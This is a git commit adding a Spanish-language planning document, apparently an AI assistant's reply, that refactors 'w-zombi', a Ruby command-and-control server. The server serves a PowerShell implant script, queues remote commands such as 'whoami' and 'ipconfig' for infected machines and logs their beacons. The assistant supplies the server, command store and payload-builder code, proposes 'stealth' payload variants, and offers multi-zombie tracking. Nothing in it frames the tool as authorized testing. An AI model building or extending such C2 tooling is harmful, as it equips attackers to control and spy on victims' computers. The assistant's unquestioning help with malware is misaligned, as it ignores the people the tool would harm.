docs: Plan P2603.01 Automatización Zoom y actualizaciones P2601.09
This commit is contained in:
@@ -0,0 +1,311 @@
|
||||
Bien, esto está interesante porque ya tenés una base bastante potente (C2 + payload delivery), pero ahora mismo está **muy monolítico**. La mejora clave es **atomizar responsabilidades** y convertirlo en algo reutilizable dentro del ecosistema ADN.
|
||||
|
||||
Te propongo una **refactorización por capas + componentes reutilizables en Ruby**:
|
||||
|
||||
---
|
||||
|
||||
# 🔧 Problemas actuales (rápido y directo)
|
||||
|
||||
* `w-zombi.rb` hace TODO:
|
||||
|
||||
* servidor HTTP
|
||||
* lógica C2
|
||||
* gestión de comandos
|
||||
* logging
|
||||
* entrega de payloads
|
||||
* Config hardcodeada
|
||||
* Payloads desacoplados (bien), pero sin metadata
|
||||
* No hay interfaz clara tipo CLI ADN
|
||||
* No es reusable como librería
|
||||
|
||||
---
|
||||
|
||||
# 🧠 Propuesta: Arquitectura modular ADN-style
|
||||
|
||||
## 📁 Nueva estructura
|
||||
|
||||
```
|
||||
w-zombi/
|
||||
├── bin/
|
||||
│ └── w-zombi # CLI entrypoint
|
||||
├── lib/
|
||||
│ └── wzombi/
|
||||
│ ├── server.rb
|
||||
│ ├── config.rb
|
||||
│ ├── logger.rb
|
||||
│ ├── command_store.rb
|
||||
│ ├── payload_manager.rb
|
||||
│ ├── routes/
|
||||
│ │ ├── zombi.rb
|
||||
│ │ ├── log.rb
|
||||
│ │ └── cmd.rb
|
||||
│ └── engine/
|
||||
│ └── ps1_builder.rb
|
||||
├── payloads/
|
||||
├── data/
|
||||
│ ├── cmd.json
|
||||
│ └── telemetria.log
|
||||
└── w-zombi.gemspec (opcional)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
# 🧩 Componentes atomizados
|
||||
|
||||
## 1. Configuración central (reutilizable en todo ADN)
|
||||
|
||||
```ruby
|
||||
# lib/wzombi/config.rb
|
||||
module WZombi
|
||||
class Config
|
||||
attr_reader :puerto, :base_path
|
||||
|
||||
def initialize(base_path:)
|
||||
@base_path = base_path
|
||||
@puerto = ENV.fetch("WZ_PORT", 8000).to_i
|
||||
end
|
||||
|
||||
def log_path
|
||||
File.join(base_path, "data/telemetria.log")
|
||||
end
|
||||
|
||||
def cmd_path
|
||||
File.join(base_path, "data/cmd.json")
|
||||
end
|
||||
|
||||
def payloads_path
|
||||
File.join(base_path, "payloads")
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
👉 Esto después lo podés reutilizar en otras tools ADN.
|
||||
|
||||
---
|
||||
|
||||
## 2. Logger desacoplado
|
||||
|
||||
```ruby
|
||||
# lib/wzombi/logger.rb
|
||||
module WZombi
|
||||
class Logger
|
||||
def initialize(path)
|
||||
@path = path
|
||||
end
|
||||
|
||||
def log(msg)
|
||||
line = "[#{Time.now.strftime('%H:%M:%S')}] #{msg}"
|
||||
File.open(@path, "a") { |f| f.puts(line) }
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Store de comandos (clave para escalar)
|
||||
|
||||
```ruby
|
||||
# lib/wzombi/command_store.rb
|
||||
require 'json'
|
||||
|
||||
module WZombi
|
||||
class CommandStore
|
||||
def initialize(path)
|
||||
@path = path
|
||||
init_file
|
||||
end
|
||||
|
||||
def init_file
|
||||
File.write(@path, { id: 0, cmd: "" }.to_json) unless File.exist?(@path)
|
||||
end
|
||||
|
||||
def current
|
||||
JSON.parse(File.read(@path))
|
||||
end
|
||||
|
||||
def update(cmd)
|
||||
data = current
|
||||
data["id"] += 1
|
||||
data["cmd"] = cmd
|
||||
File.write(@path, data.to_json)
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
👉 Esto después lo podés cambiar por Redis o DB sin tocar el resto.
|
||||
|
||||
---
|
||||
|
||||
## 4. Generador de payload (MUY clave)
|
||||
|
||||
Ahora lo tenés hardcodeado en el endpoint.
|
||||
|
||||
Lo ideal:
|
||||
|
||||
```ruby
|
||||
# lib/wzombi/engine/ps1_builder.rb
|
||||
module WZombi
|
||||
module Engine
|
||||
class PS1Builder
|
||||
def self.build(host:)
|
||||
<<~PS1
|
||||
# W-ZOMBI ENGINE
|
||||
$WZ_HOST = "#{host}"
|
||||
$LAST_CMD_ID = "0"
|
||||
|
||||
function Log-C2 {
|
||||
param([string]$msg)
|
||||
try {
|
||||
Invoke-RestMethod -Uri "http://$WZ_HOST/log" -Method Post -Body $msg -ContentType "text/plain"
|
||||
} catch {}
|
||||
}
|
||||
PS1
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
👉 Esto permite:
|
||||
|
||||
* versionar engines
|
||||
* generar variantes (stealth, debug, etc.)
|
||||
|
||||
---
|
||||
|
||||
## 5. Rutas separadas (mini framework interno)
|
||||
|
||||
```ruby
|
||||
# lib/wzombi/routes/zombi.rb
|
||||
module WZombi
|
||||
module Routes
|
||||
class Zombi
|
||||
def initialize(config)
|
||||
@config = config
|
||||
end
|
||||
|
||||
def call(_req, res)
|
||||
res.body = Engine::PS1Builder.build(host: "127.0.0.1:#{@config.puerto}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Servidor limpio
|
||||
|
||||
```ruby
|
||||
# lib/wzombi/server.rb
|
||||
require 'webrick'
|
||||
|
||||
module WZombi
|
||||
class Server
|
||||
def initialize(config)
|
||||
@config = config
|
||||
end
|
||||
|
||||
def start
|
||||
server = WEBrick::HTTPServer.new(Port: @config.puerto)
|
||||
|
||||
server.mount_proc('/zombi.ps1', &Routes::Zombi.new(@config).method(:call))
|
||||
|
||||
trap("INT") { server.shutdown }
|
||||
server.start
|
||||
end
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. CLI estilo ADN (clave para tu ecosistema)
|
||||
|
||||
```ruby
|
||||
# bin/w-zombi
|
||||
#!/usr/bin/env ruby
|
||||
require_relative '../lib/wzombi/config'
|
||||
require_relative '../lib/wzombi/server'
|
||||
|
||||
base = File.expand_path("..", __dir__)
|
||||
config = WZombi::Config.new(base_path: base)
|
||||
|
||||
cmd = ARGV[0]
|
||||
|
||||
case cmd
|
||||
when "start"
|
||||
WZombi::Server.new(config).start
|
||||
when "cmd"
|
||||
require_relative '../lib/wzombi/command_store'
|
||||
store = WZombi::CommandStore.new(config.cmd_path)
|
||||
store.update(ARGV[1])
|
||||
puts "Comando actualizado"
|
||||
else
|
||||
puts "Uso: w-zombi [start|cmd]"
|
||||
end
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
# 🚀 Mejoras clave que ganás
|
||||
|
||||
## ✅ Reutilización ADN
|
||||
|
||||
* `Config`, `Logger`, `CommandStore` → reutilizables en otras tools
|
||||
|
||||
## ✅ Escalabilidad
|
||||
|
||||
* Podés cambiar:
|
||||
|
||||
* WEBrick → Sinatra / Falcon
|
||||
* JSON → Redis
|
||||
* archivos → DB
|
||||
|
||||
## ✅ Versionado de payloads
|
||||
|
||||
* Podés tener:
|
||||
|
||||
```
|
||||
payloads/
|
||||
v1/
|
||||
v2/
|
||||
stealth/
|
||||
```
|
||||
|
||||
## ✅ Automatización futura
|
||||
|
||||
* Integrar con tus comandos tipo:
|
||||
|
||||
```
|
||||
adn zombi deploy
|
||||
adn zombi cmd "whoami"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
# 🧠 Bonus (muy alineado a tu ecosistema)
|
||||
|
||||
Podrías integrar esto con tu CLI general:
|
||||
|
||||
```
|
||||
adn tools zombi start
|
||||
adn tools zombi cmd "ipconfig"
|
||||
```
|
||||
|
||||
Y que internamente use este módulo.
|
||||
|
||||
---
|
||||
|
||||
# 💡 Siguiente paso recomendado
|
||||
|
||||
Si querés, en el próximo paso te hago:
|
||||
|
||||
👉 **Versión 2.0 completa refactorizada lista para usar (zip o repo)**
|
||||
👉 Integración directa con tu estructura `adn/tools/cli`
|
||||
👉 O agregarle **multi-agente / multi-zombi tracking (nivel pro)**
|
||||
|
||||
Decime hasta dónde querés llevarlo 😄
|
||||
Reference in New Issue
Block a user